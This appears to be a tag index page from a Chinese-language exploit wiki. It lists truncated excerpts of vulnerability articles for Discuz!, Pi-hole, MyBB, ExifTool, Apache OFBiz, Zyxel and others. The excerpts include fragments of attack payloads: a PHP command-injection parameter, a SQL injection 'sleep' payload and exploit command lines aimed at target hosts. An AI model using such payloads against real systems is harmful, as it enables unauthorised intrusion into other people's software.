Discuz! 1.5-2.5 命令执行漏洞/zh-hant
免费、自由、人人可编辑的漏洞库 , 漏洞利用 登录管理员后台 修改的参数 参数customtables customtables%5B%5D=pre_common_admincp_cmenu">aaa; echo '<?php ...
标签:hant
以下是与标签“hant”相关联的文章
-
-
CVE 2020-8816 Pi-hole 远程代码执行漏洞/zh-hant
pwnwiki.com , 影响版本 Pi-hole <= 4.3.2 POC go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://target/a ...
-
CVE-2021-3378 FortiLogger未经身份验证文件上传漏洞/zh-hant
PWNWIK.COM , 影响版本 4.4.2.2 POC https://github.com/erberkan/fortilogger_arbitrary_fileupload PWNWIK.COM==免费、自由、人人可编辑的漏洞库
-
CVE-2021-3297 Zyxel NBG2105 身份验证绕过漏洞/zh-hant
PWNWIK.COM , 漏洞影响 Zyxel NBG2105 FOFA app="ZyXEL-NBG2105" 其中前端文件 /js/util_gw.js 存在前端对 Cookie login参数的校验。 请求如下则会以管理员身份跳转到 ...
-
CVE-2021-27947 MyBB后台论坛复制SQL注入漏洞/zh-hant
免费、自由、人人可编辑的漏洞库--PwnWiki.com , 影响版本 < 1.8.26 漏洞利用 首先创建一个论坛: 注意这里要配置密码为payload: 1 and sleep(10) and ' 接着在options里点击cop ...
-
CVE-2021-26855 – Exchange Server SSRF漏洞/zh-hant
免费、自由、人人可编辑的漏洞库 , 漏洞简介 Exchange服务器端请求伪造(SSRF)漏洞,利用此漏洞的攻击者能够发送任意HTTP请求并通过Exchange Server进行身份验证。 影响范围 Microsoft Exchange S ...
-
CVE-2021-26708 Linux kernel before 5.10.13 特权提升漏洞/zh-hant
免费、自由、人人可编辑的漏洞库 , Contents 1 脆弱点 2 内存破坏 3 模糊测试 4 四字节的力量 5 内核信息泄露 6 实现任意读 6.1 从 arbitrary free 到 use-after-free 6.2 任意读的步 ...
-
CVE-2021-26295 Apache OFBiz RMI反序列化漏洞/zh-hant
pwnwiki.com , 漏洞影响 Apache OFBiz < 17.12.06 POC #coding:utf-8 import binascii import os import requests import urllib3 ...
-
CVE-2021-22204 ExifTool任意代码执行漏洞/zh-hant
PWNWIK.COM , 影响版本 ExifTool 7.44 to 12.23 POC $ printf 'P1 1 1 0' > moo.pbm $ cjb2 moo.pbm moo.djvu $ printf 'ANTa\0\0 ...
-
CVE-2020-13699 TeamViewer 远程代码执行漏洞/zh-hant
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , 影响版本 TeamViewer < 8.0.258861 TeamViewer < 9.0.28860 TeamViewer < 10.0.258873 Tea ...